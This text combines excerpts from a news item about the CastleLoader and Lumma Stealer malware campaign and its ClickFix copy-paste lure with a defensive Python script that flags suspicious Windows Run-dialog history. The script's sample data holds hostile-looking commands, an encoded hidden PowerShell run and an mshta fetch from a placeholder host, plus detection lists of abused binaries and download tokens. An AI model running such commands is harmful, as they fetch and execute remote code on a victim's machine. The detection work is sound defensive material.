
"CastleLoader plays an important role in the current campaign. This loader runs exclusively in memory and therefore leaves little trace on the hard drive. This makes it more difficult for traditional security solutions to recognize the threat. The code is also heavily obfuscated, and communication with the controlling infrastructure is flexible. Once CastleLoader is active, Lumma Stealer is brought in as a second phase."
"The distribution method is remarkably simple. Victims receive instructions via a fake verification or error message to copy text and paste it into the Windows execution window. What looks like an innocent verification process turns out to be the launch of malicious code. Researchers point out that this tactic works mainly because users have become accustomed to technical workarounds and verification steps, lowering the threshold for following instructions."
"This loader runs exclusively in memory and therefore leaves little trace on the hard drive. The code is also heavily obfuscated, and communication with the controlling infrastructure is flexible. It is striking that the infrastructure behind the malware has been quickly rebuilt after previous disruptions by investigative services. By using rotating domains and sometimes legitimate online services to host files, the operators can make detection more difficult and reduce suspicion."
Lumma Stealer campaigns are spreading widely through the ClickFix social-engineering technique, which tricks victims into copying and pasting commands into the Windows execution window (the Run dialog). CastleLoader, a heavily obfuscated in-memory loader with flexible C2 communication, stages the second-phase Lumma payload and leaves little forensic trace on disk. The social-engineering prompt exploits users' familiarity with technical verification steps to lower suspicion. Once active, Lumma harvests stored passwords, browser data, documents, crypto wallets, authentication tokens, and system profiling information for resale or follow-on attacks. Operators rapidly rebuild infrastructure using rotating domains and legitimate hosting services to evade takedowns and reduce detection.
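Because the ClickFix lure relies on the victim typing into the Run dialog, one host-level check a defender can make is to review that dialog's history, which Windows keeps under the RunMRU registry key. The script below is an added example, not code from the article or from any research it cites; the RunMRU values are constructed, and the interpreter and token lists are assumptions about what such pasted commands typically contain.

```python
import re

# Constructed sample of the values stored under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (not from the article).
# Windows appends "\1" to each stored command; MRUList lists the slots, most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "powershell -w hidden -ep bypass -enc <BASE64_PLACEHOLDER>\\1",
    "c": "mshta https://verify.example.invalid/check.hta\\1",
}

# Interpreters and download utilities that rarely belong in an end user's Run history.
LOLBINS = {"powershell", "pwsh", "mshta", "cmd", "curl", "certutil",
           "bitsadmin", "rundll32", "regsvr32", "wscript", "cscript"}

# Switches and tokens pointing to hidden, policy-bypassing or remote execution.
SUSPICIOUS_TOKENS = [
    r"-enc\b", r"-w(?:indowstyle)?\s+hidden", r"-ep\s+bypass",
    r"-executionpolicy\s+bypass", r"\biex\b", r"invoke-expression",
    r"downloadstring", r"https?://",
]


def parse_runmru(values):
    """Return the stored Run-box commands, most recent first, without the '\\1' suffix."""
    commands = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is not None:
            commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def score_command(command):
    """Return the indicator names matched by one command line (empty list if benign)."""
    lowered = command.lower()
    parts = lowered.split()
    head = parts[0].strip('"') if parts else ""
    binary = re.sub(r"\.exe$", "", head.split("\\")[-1].split("/")[-1])
    hits = ["lolbin:" + binary] if binary in LOLBINS else []
    hits += ["token:" + p for p in SUSPICIOUS_TOKENS if re.search(p, lowered)]
    return hits


def flag_clickfix(values):
    """Return (command, indicators) pairs for every RunMRU entry with at least one hit."""
    flagged = []
    for cmd in parse_runmru(values):
        hits = score_command(cmd)
        if hits:
            flagged.append((cmd, hits))
    return flagged
```

On a live host the same logic can be fed from the registry with `winreg` under the user's hive; a hit warrants pulling process-creation and script-block logs for the same time window.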
Read at Techzine Global